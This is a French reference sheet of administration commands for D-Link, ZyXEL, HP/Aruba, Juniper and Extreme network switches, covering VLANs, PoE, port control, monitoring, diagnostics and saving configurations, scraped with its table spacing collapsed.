config poe ports 7 state disableCouper PoEconfig poe ports 7 state enableRéactiver PoEconfig ports 1 state disableCouper un portconfig ports 1 state enableRéactiver un portSwitchD-LinkDiagnostic
cable_diag ports 3Test câble port 3show traffic_segmentationVoir la segmentation de traficconfig traffic_segmentation 22 forward_list 10,21Isoler un portSwitchD-LinkSystème
saveSauvegarderrebootRedémarrerSwitchZyXELConnexion
telnet <ip_switch>Connexion (défaut: 192.168.1.1 admin/1234)SwitchZyXELMonitoring
show interfaces statusÉtat des portsshow interfaces 2Détail d'un portshow interfaces config 5PVID d'un portshow mac address-table allTable MAC complèteshow mac address-table port 2MAC sur un portshow lldp info remoteVoisinage LLDPshow running-configConfig complèteshow pwrÉtat PoESwitchZyXELVLAN
vlan 101Créer / entrer dans VLAN 101fixed 4-5Ajouter ports Taggeduntagged 5Port en Untaggedno untagged 5Repasser en Taggedno fixed 4-5Retirer ports du VLANno vlan 209Supprimer un VLANpvid 101Changer le PVID (en mode interface)SwitchZyXELInterfaces
no inactiveRéactiver un port coupéinterface port-channel XSélectionner un portSwitchZyXELPoE
pwr interface 2Activer PoEno pwr interface 2Couper PoEpwr mode consumptionMode consumption (si >11 AP)SwitchZyXELDiagnostic
cable-diagnostics 2Test câbleshow interface transceiver <port>Vérif fibre / SFPSwitchZyXELSystème
wr mSauvegarderreload config 1Redémarrer avec config startupSwitchHP/ArubaVLAN
show vlansVLANs configurésvlan 10 untagged 1-24Ports accessvlan 10 tagged 25-26Ports trunkSwitchHP/ArubaTrunk
trunk 25-26 trk1 lacpLACP trunkSwitchHP/ArubaSTP
spanning-tree 1-24 admin-edge-portEdge-port (= PortFast)SwitchHP/ArubaMonitoring
show trunksAfficher les agrégations de liensshow running-configConfiguration activeshow interfaces briefÉtat résumé des portsshow mac-addressTable MACshow spanning-treeÉtat du Spanning TreeSwitchHP/ArubaSystème
write memorySauvegarderSwitchJuniperVLAN
show vlansVLANs configurésset vlans SERVEURS vlan-id 10Créer un VLANset interfaces ge-0/0/1 unit 0 family ethernet-switching vlan members 10Assigner portSwitchJuniperSTP
set protocols rstp interface ge-0/0/1 edgeEdge-port RSTPSwitchJuniperMonitoring
show ethernet-switching tableTable de commutation MACshow interfaces terseÉtat résumé des interfacesshow spanning-tree bridgeInfos bridge STPshow arpTable ARPshow lldp neighborsVoisinage LLDPshow routeTable de routageshow chassis hardwareInventaire matérielshow log messagesLogs systèmeshow log ?Lister les fichiers de log disponiblesSwitchJuniperSystème
commitAppliquer les changementsrollback 1Config précédenteshow configuration | compare rollback 1Comparer config actuelle vs précédenteSwitchJuniperNavigation
configureEntrer en mode configurationexitSortir du mode courantSwitchJuniperSSH rebond
ssh user@host source <ip_locale>Forcer l'IP source (rebond JunOS)SwitchExtremeVLAN
create vlan SERVEURS tag 10Créer un VLANconfigure vlan SERVEURS add ports 1-24 untaggedPorts accessconfigure vlan SERVEURS add ports 25 taggedPort trunkSwitchExtremeMonitoring
show vlanAfficher tous les VLANsshow ports informationÉtat de tous les portsshow fdbTable MACshow stpd detailDétails du Spanning TreeSwitchExtremeSystème
save configurationSauvegarder